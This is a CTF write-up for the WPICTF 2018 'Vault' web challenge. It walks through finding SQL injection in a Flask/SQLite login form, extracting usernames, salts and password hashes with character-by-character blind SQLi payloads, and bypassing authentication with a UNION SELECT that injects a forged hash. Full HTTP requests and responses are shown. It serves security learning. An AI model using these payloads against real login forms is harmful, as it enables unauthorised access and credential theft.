CTFtime.org / WPICTF 2018 / Vault / Writeup

# ▼▼▼Vault(Web:200) 79/605=13.1％▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
https://vault.wpictf.xyz
UPDATE: everything fixed
by GODeva
```

---

**【Information gathering】**

```
GET / HTTP/1.1
Host: vault.wpictf.xyz
```

↓

```
<html>

<body>

<div class = "box" rel="stylesheet">
<h1>Fuller Commons Vault</h1>

Welcome to fuller commons secret digital vault.
To retreive your stuff, log in below.

Active clients

Goutham: A password ... hmmm

Gaines: 90s mixtape

Binam: How to not die from stress presentation

<label for="clientname">Username:</label>
<input type="text" name="clientname" id="clientname">

<label for="password">Password:</label>
<input type="password" name="password" id="password">

<input type="submit" value="Log In!">

</form>
</div>
</body>
</html>
```

↓

**(Hint-1)**

```

```

↓

I guessed SQL injection problem

---

**(Hint-2)**

↓decode with base64

What? You thought this was a flag? Ha that would be to easy. That's just not my style? ~ Goutham

↓

Not a hint

---

**【Identify the location of the vulnerability】**

```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

clientname='or'1'='1&password=1
```

↓

`Invalid password for 'or'1'='1!`

```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

clientname='or'1'='0&password=1
```

↓

`No such user in the database 'or'1'='0!`

SQLi vulnerability exists in `clientname` because the responses are different

---

```
clientname='or'1'='1&password='or'1'='1 ⇒Invalid password for 'or'1'='1!
clientname='or'1'='1&password='or'1'='0 ⇒Invalid password for 'or'1'='1!
```

↓

There is no SQLi vulnerability in the password part

---

clientname='union+select+1--%2B&password=1

↓

500 Responce

**(1)error message**

```
OperationalError: SELECTs to the left and right of UNION do not have the same number of result columns // Werkzeug Debugger
```

**(2)DB type**

```
sqlite3.OperationalError
```

**(3)SQL statement**

```
File "/home/vault/vault/secretvault.py", line 58, in login
connection = sqlite3.connect(os.path.join(directoryFordata, 'clients.db'))
pointer = connection.cursor()

search = """SELECT id, hash, salt FROM clients
WHERE clientname = '{0}' LIMIT 1""".format(clientname)
pointer.execute(search)

res = pointer.fetchone()
if not res:
return "No such user in the database {0}!\n".format(clientname)
userID, hash, salt = res
```

---

**【Try1】ERROR Based SQLi**

In Sqlite, ERROR based SQLinjection is possible with `MATCH` function

↓

`clientname='MATCH '1'||sqlite_version()--+;&password=1`

↓

OperationalError: unable to use function MATCH in the requested context // Werkzeug Debugger

---

**【Try2】Blind SQLi**

```
clientname='or(select count(id) from clients)>1--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)>1-- !
clientname='or(select count(id) from clients)>2--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)>2-- !
clientname='or(select count(id) from clients)>3--+&password=1 ⇒ No such user in the database 'or(select count(id) from clients)>3-- !
clientname='or(select count(id) from clients)=3--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)=3-- !
```

↓

3 users exist

---

Get the value of `clientname`, `salt`, `hash`

```
clientname='or (substr((select group_concat(clientname,",") from/**/clients),1,1))="G"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),2,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),3,1))="i"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),4,1))="n"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),5,1))="e"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),6,1))="s"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),7,1))=","+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),8,1))="G"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),9,1))="o"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),10,1))="u"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),11,1))="t"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),12,1))="h"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),13,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),14,1))="m"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),15,1))=","+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),16,1))="B"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),17,1))="i"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),18,1))="n"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),19,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),20,1))="m"+--+&password=1
```

↓

Gaines,Goutham,Binam

---

```
clientname='or (substr((select group_concat(salt,",") from/**/clients),1,1))="l"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),2,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),3,1))="o"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),4,1))="c"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),5,1))="z"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),6,1))="v"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),7,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),8,1))=","+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),9,1))="n"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),10,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),11,1))="p"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),12,1))="d"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),13,1))="r"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),14,1))="q"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),15,1))="s"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),16,1))=","+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),17,1))="c"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),18,1))="s"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),19,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),20,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),21,1))="r"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),22,1))="l"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),23,1))="b"+--+&password=1
```

↓

leoczve,nepdrqs,cseerlb

---

```
clientname='or (substr((select group_concat(hash,",") from/**/clients),1,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),2,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),3,1))="6"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),4,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),5,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),6,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),7,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),8,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),9,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),10,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),11,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),12,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),13,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),14,1))="8"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),15,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),16,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),17,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),18,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),19,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),20,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),21,1))="6"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),22,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),23,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),24,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),25,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),26,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),27,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),28,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),29,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),30,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),31,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),32,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),33,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),34,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),35,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),36,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),37,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),38,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),39,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),40,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),41,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),42,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),43,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),44,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),45,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),46,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),47,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),48,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),49,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),50,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),51,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),52,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),53,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),54,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),55,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),56,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),57,1))="8"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),58,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),59,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),60,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),61,1))="0"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),62,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),63,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),64,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),65,1))=","+--+&password=1
・・・
```

↓

```
ae6b2b347fd948b39a126e71decfc1cc411925a1ddc9f995949517d983fb027b,
6bad0bd9907898e3c7d6b2139241ac7591a4556b2f9fbc41ed15a31e6d2df738,
49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7
```

---

**【Try1:Identify password】**

```
<h4>File <cite class="filename">"/home/vault/vault/secretvault.py"</cite>,
line <em class="line">65</em>,
in login</h4>
<div class="source">

<span>    </span>res = pointer.fetchone()

<span>    </span>if not res:

<span>        </span>return "No such user in the database {0}!\n".format(clientname)

<span>    </span>userID, hash, salt = res

<span></span>

<span>    </span>calculatedHash = hashlib.sha256(password + salt)

<span>    </span>if calculatedHash.hexdigest() != hash:

<span>        </span>return "Invalid password for {0}!\n".format(clientname)

<span></span>

<span>    </span>flask.session['userID'] = userID

<span>    </span>return flask.redirect('/')

</div>
```

↓

calculatedHash = hashlib.sha256(password + salt)

↓

Attempting password list attack can not be specified

---

**【Try2:Direct login】**

calculatedHash = hashlib.sha256(password + salt)

clientname=`Gaines` → id=`2`
salt=`1`
pass=`1`　※Appropriate value

↓

hash=sha256(password + salt)=sha256("1" + "1")=`4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8`

↓

SQL statement to be created

`SELECT id, hash, salt FROM clients WHERE clientname = ''UNION/**/SELECT/**/"2","4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8","1"-- `

---

```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Connection: close
Content-Length: 119
Cache-Control: max-age=0
Origin: https://vault.wpictf.xyz
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://vault.wpictf.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8

clientname='UNION/**/SELECT/**/"2","4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8","1"--+&password=1
```

↓

```
HTTP/1.1 302 FOUND
Server: nginx/1.13.12
Date: Sat, 14 Apr 2018 13:04:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Location: https://vault.wpictf.xyz/
Connection: close
Set-Cookie: session=eyJ1c2VySUQiOiIyIn0.DbON7w.AXruR3kgJ2-tqE8RLndXYV6yOg0; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000

<title>Redirecting...</title>
<h1>Redirecting...</h1>

You should be redirected automatically to target URL: /. If not click the link.
```

↓

```
GET / HTTP/1.1
Host: vault.wpictf.xyz
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://vault.wpictf.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: session=eyJ1c2VySUQiOiIyIn0.DbON7w.AXruR3kgJ2-tqE8RLndXYV6yOg0
```

↓

```
HTTP/1.1 200 OK
Server: nginx/1.13.12
Date: Sat, 14 Apr 2018 13:07:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 128
Connection: close
Strict-Transport-Security: max-age=31536000

Welcome back valid user! Your digital secret is: "WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}" (Log out)
```

↓

`WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}`

Vault

Comments

Sign in with